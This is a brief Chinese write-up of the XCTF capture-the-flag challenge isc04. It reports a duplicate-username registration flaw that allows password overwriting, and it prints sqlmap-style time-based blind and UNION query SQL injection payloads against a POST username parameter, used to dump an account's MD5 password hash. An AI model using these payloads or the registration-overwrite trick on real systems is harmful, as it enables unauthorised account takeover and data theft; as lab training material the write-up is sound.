xctf-攻防世界-isc04
注册处存在同用户名重复注册,导致密码可以任意改写
Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=123' AND (SELECT 4750 FROM (SELECT(SLEEP(5)))Rwcs)-- wjMD Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: username=123' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7871,0x636671764e6c68695068646472496e566a455755796261766b5158714651714c514448416b6e6746,0x71786b6271),NULL-- -
注入得到账号和密码MD5值,cmd5、somd5等在线解密都解密不了。
回想之前发现的重复注册,利用该漏洞改写密码。